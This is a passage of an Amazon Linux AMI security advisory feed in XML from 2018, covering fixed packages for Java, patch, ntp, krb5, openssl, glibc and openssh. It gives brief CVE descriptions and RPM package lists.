Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).
1568515:
CVE-2018-2790 OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2790" title="" id="CVE-2018-2790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2794" title="" id="CVE-2018-2794" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2795" title="" id="CVE-2018-2795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2796" title="" id="CVE-2018-2796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2797" title="" id="CVE-2018-2797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2798" title="" id="CVE-2018-2798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2799" title="" id="CVE-2018-2799" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2800" title="" id="CVE-2018-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2814" title="" id="CVE-2018-2814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2815" title="" id="CVE-2018-2815" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.181-2.6.14.1.79.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" 
version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1008</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1008: important priority package update for patch</title><issued date="2018-05-10 16:52:00" /><updated date="2018-05-10 
23:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000156:
GNU Patch version 2.7.6 contains an input validation vulnerability when processing patch files: specifically, the EDITOR_PROGRAM invocation (using ed) can result in code execution. This attack appears to be exploitable via a patch file processed by the patch utility. This is similar to FreeBSD&#039;s CVE-2015-1418; although they share a common ancestry, the code bases have diverged over time.
1564326:
CVE-2018-1000156 patch: Malicious patch files cause ed to execute arbitrary commands
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000156" title="" id="CVE-2018-1000156" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="patch" version="2.7.1" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-2.7.1-10.10.amzn1.x86_64.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-debuginfo-2.7.1-10.10.amzn1.x86_64.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/patch-debuginfo-2.7.1-10.10.amzn1.i686.rpm</filename></package><package name="patch" version="2.7.1" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/patch-2.7.1-10.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1009</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1009: medium priority package update for ntp</title><issued date="2018-05-10 17:01:00" /><updated date="2023-10-25 21:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7185:
The protocol engine in ntp 4.2.6 before 4.2.8p11 allows remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and a source IP address of the "other side" of an interleaved association, causing the victim ntpd to reset its association.
CVE-2018-7184:
ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the "received" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.
CVE-2018-7183:
Buffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.
CVE-2018-7182:
The ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet sent to an ntpd instance from 4.2.8p6 through 4.2.8p10.
CVE-2018-7170:
A flaw was found in ntpd making it vulnerable to Sybil attacks. An authenticated attacker could target systems configured to use a trusted key in certain configurations, create an arbitrary number of associations and subsequently modify a victim's clock.
CVE-2016-1549:
A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.
CVE-2013-5211:
The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211" title="" id="CVE-2013-5211" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549" title="" id="CVE-2016-1549" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170" title="" id="CVE-2018-7170" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182" title="" id="CVE-2018-7182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183" title="" id="CVE-2018-7183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184" title="" id="CVE-2018-7184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185" title="" id="CVE-2018-7185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntpdate" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.8p11-1.37.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.8p11-1.37.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.8p11-1.37.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.8p11-1.37.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.8p11-1.37.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.8p11-1.37.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.8p11" 
release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.8p11-1.37.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.8p11-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1010</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1010: medium priority package update for krb5</title><issued date="2018-09-05 19:27:00" /><updated date="2018-09-06 21:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7562:
An authentication bypass flaw was found in the way krb5&#039;s certauth interface handled the validation of client certificates. A remote attacker able to communicate with the KDC could potentially use this flaw to impersonate arbitrary principals under rare and erroneous circumstances.
1485510:
CVE-2017-7562 krb5: Authentication bypass by improper validation of certificate EKU and SAN
CVE-2017-11368:
A denial of service flaw was found in MIT Kerberos krb5kdc service. An authenticated attacker could use this flaw to cause krb5kdc to exit with an assertion failure by making an invalid S4U2Self or S4U2Proxy request.
1473560:
CVE-2017-11368 krb5: Invalid S4U2Self or S4U2Proxy request causes assertion failure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11368" title="" id="CVE-2017-11368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7562" title="" id="CVE-2017-7562" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" 
release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-19.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1016</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1016: medium priority package update for openssl</title><issued date="2018-05-10 17:29:00" /><updated date="2018-05-10 23:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3738:
There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL versions 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository.
1523510:
CVE-2017-3738 openssl: rsaz_1024_mul_avx2 overflow bug on x86_64
CVE-2017-3737:
OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an &quot;error state&quot; mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL versions 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected.
1523504:
CVE-2017-3737 openssl: Read/write after SSL object in error state
CVE-2017-3736:
There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen.
1509169:
CVE-2017-3736 openssl: bn_sqrx8x_internal carry bug on x86_64
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3736" title="" id="CVE-2017-3736" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3737" title="" id="CVE-2017-3737" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3738" title="" id="CVE-2017-3738" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="12.109.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-static-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-12.109.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1017</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1017: important priority package update for glibc</title><issued date="2018-05-10 17:45:00" /><updated date="2018-05-10 23:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000001:
In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.
1533836:
CVE-2018-1000001 glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation
CVE-2017-15804:
The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator.
1505298:
CVE-2017-15804 glibc: Buffer overflow during unescaping of user names with the ~ operator
CVE-2017-15670:
The GNU C Library (aka glibc or libc6) before 2.27 contains an off-by-one error leading to a heap-based buffer overflow in the glob function in glob.c, related to the processing of home directories using the ~ operator followed by a long string.
1504804:
CVE-2017-15670 glibc: Buffer overflow in glob with GLOB_TILDE
CVE-2017-12132:
The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation.
1477529:
CVE-2017-12132 glibc: Fragmentation attacks possible when EDNS0 is enabled
CVE-2015-5180:
res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash).
1249603:
CVE-2015-5180 glibc: DNS resolver NULL pointer dereference with crafted record type
CVE-2014-9402:
The nss_dns implementation of getnetbyname in GNU C Library (aka glibc) before 2.21, when the DNS backend in the Name Service Switch configuration is enabled, allows remote attackers to cause a denial of service (infinite loop) by sending a positive answer while a network name is being processed.
1175369:
CVE-2014-9402 glibc: denial of service in getnetbyname function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9402" title="" id="CVE-2014-9402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5180" title="" id="CVE-2015-5180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12132" title="" id="CVE-2017-12132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15670" title="" id="CVE-2017-15670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15804" title="" id="CVE-2017-15804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000001" title="" id="CVE-2018-1000001" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nscd" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="222.173.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/glibc-devel-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-222.173.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="222.173.amzn1" epoch="0" 
arch="i686"><filename>Packages/glibc-common-2.17-222.173.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1018</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1018: low priority package update for openssh</title><issued date="2018-05-10 17:51:00" /><updated date="2018-05-10 23:39:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15906:
The process_open function in sftp-server.c in OpenSSH before 7.6 does not properly prevent write operations in readonly mode, which allows attackers to create zero-length files.
1506630:
CVE-2017-15906 openssh: Improper write operations in readonly mode allow for zero-length file creation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15906" title="" id="CVE-2017-15906" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-cavs" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-16.69.amzn1.i686.rpm</filename></package><package 
name="openssh-cavs" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.69.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.69.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-16.69.amzn1.i686.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-16.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1019</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1019: medium priority package update for php56 php70 php71</title><issued date="2018-05-10 18:23:00" /><updated date="2018-05-10 23:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10549:
